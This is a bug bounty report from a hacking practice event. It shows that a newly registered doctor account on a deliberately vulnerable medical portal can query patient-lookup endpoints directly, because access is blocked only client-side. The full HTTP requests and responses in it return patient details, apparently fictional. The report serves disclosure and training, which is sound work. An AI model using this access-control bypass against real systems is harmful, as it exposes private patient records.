FirstBlood-#226Recently registered doctor account can still query /drpanel/drapi/qp.php & /drpanel/drapi/query.php



On 2021-05-13, 0xconft reported:

Hi there,

I found doctor registration invitation code posted on reddit "F16CA47250E445888824A9E63AE445CE" (https://webcache.googleusercontent.com/search?q=cache:fTlNOjiZGM4J:https://www.reddit.com/r/BugBountyHunter/comments/n4xzw1/firstbloodhackerscom_doctor_registration/+&cd=1&hl=id&ct=clnk&gl=id) and i can use it for register doctor account

i notice on recently registered doctor account there's filter that disallow it to view patient information. but it's only happens on client side. These account can still query the qp.php & query.php endpoint with their drps cookie

PoC. Cookie drps=14cdcff76e1ed0f28938d98d2 is the cookie of recently registered doctor account Request

GET /drpanel/index.php HTTP/1.1
Host: firstbloodhackers.com:49648
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: drps=14cdcff76e1ed0f28938d98d2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 17:37:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10463

-snip-
                                        <div class="alert alert-danger" role="alert"> <strong>Warning:</strong> As your account has been recently registered you will not be able to view patient information yet. </div>
-snip-

PoC of qp.php Request

POST /drpanel/drapi/qp.php HTTP/1.1
Host: firstbloodhackers.com:49648
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://firstbloodhackers.com:49648
Connection: close
Referer: http://firstbloodhackers.com:49648/drpanel/index.php
Cookie: drps=14cdcff76e1ed0f28938d98d2

name=sea

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 17:39:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 228

Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>

PoC of query.php Request

GET /drpanel/drapi/query.php?aptid=56910219 HTTP/1.1
Host: firstbloodhackers.com:49648
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://firstbloodhackers.com:49648/drpanel/index.php
Cookie: drps=14cdcff76e1ed0f28938d98d2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 17:39:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 261

For safeguarding reasons please do not leave this alert on your screen when unattended! Use information below to verify patients over the phone.

Name: John Smith
Address: 1 Quay Point, Station Road, Woodbridge, IP12 4AL
Telephone: 0113 271 2111
DOB: 09/09/1990

Best Regards, 0xconft

P1 CRITICAL

Endpoint: /drpanel/drapi/qp.php & /drpanel/drapi/query.php

Parameter: cookie

Payload: drps cookie of recently registered doctor account


FirstBlood ID: 11
Vulnerability Type: Application/Business Logic

Administrator endpoints can be accessed by non privileged doctor accounts which reveals sensitive patient information.


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.